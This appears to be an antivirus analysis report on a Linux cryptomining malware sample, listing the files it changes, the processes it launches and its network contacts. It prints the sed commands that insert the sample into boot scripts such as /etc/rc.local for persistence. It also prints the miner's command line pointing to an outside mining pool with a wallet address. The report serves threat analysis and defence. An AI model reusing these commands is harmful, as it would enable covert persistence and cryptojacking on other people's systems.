Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.local
Malicious functions:
Launches itself as a daemon
Launches processes:
- sh -c sed -i -e '/exit/d' /etc/rc.local
- sed -i -e /exit/d /etc/rc.local
- sh -c sed -i -e '/
- sed -i -e /
- sh -c sed -i -e '/<SAMPLE> reboot/d' /etc/rc.local
- sed -i -e /<SAMPLE> reboot/d /etc/rc.local
- sh -c sed -i -e '2 i<SAMPLE_FULL_PATH> reboot' /etc/rc.local
- sed -i -e 2 i<SAMPLE_FULL_PATH> reboot /etc/rc.local
- sh -c sed -i -e '2 i<SAMPLE_FULL_PATH> reboot start' /etc/rc.d/rc.local
- sed -i -e 2 i<SAMPLE_FULL_PATH> reboot start /etc/rc.d/rc.local
- sh -c sed -i -e '2 i<SAMPLE_FULL_PATH> reboot start' /etc/init.d/boot.local
- sed -i -e 2 i<SAMPLE_FULL_PATH> reboot start /etc/init.d/boot.local
- /bin/sh -c ./xxsdwak<SAMPLE> -B -o stratum+tcp://mine.ppxxmr.com:7777 -u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi -p x -k
- ./xxsdwak<SAMPLE> -B -o stratum+tcp://mine.ppxxmr.com:7777 -u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi -p x -k
Performs operations with the file system:
Modifies file access rights:
- /etc/sedvy3kmw
- /etc/sedYuJs4O
- /etc/sedTsCVv1
Creates or modifies files:
- /etc/sedvy3kmw
- /etc/sedYuJs4O
- /etc/sedTsCVv1
- /root/xxszznk
- /root/xxsdwak<SAMPLE>
- /root/.cnrig.cacert.pem
Network activity:
Establishes connection:
- 22#.##7.232.9:7777
- 15#.##1.84.133:443
DNS ASK:
- mi##.ppxxmr.com
- ra#.####ubusercontent.com
Sends data to the following servers:
- 22#.##7.232.9:7777
- 15#.##1.84.133:443
Receives data from the following servers:
- 15#.##1.84.133:443
- 22#.##7.232.9:7777
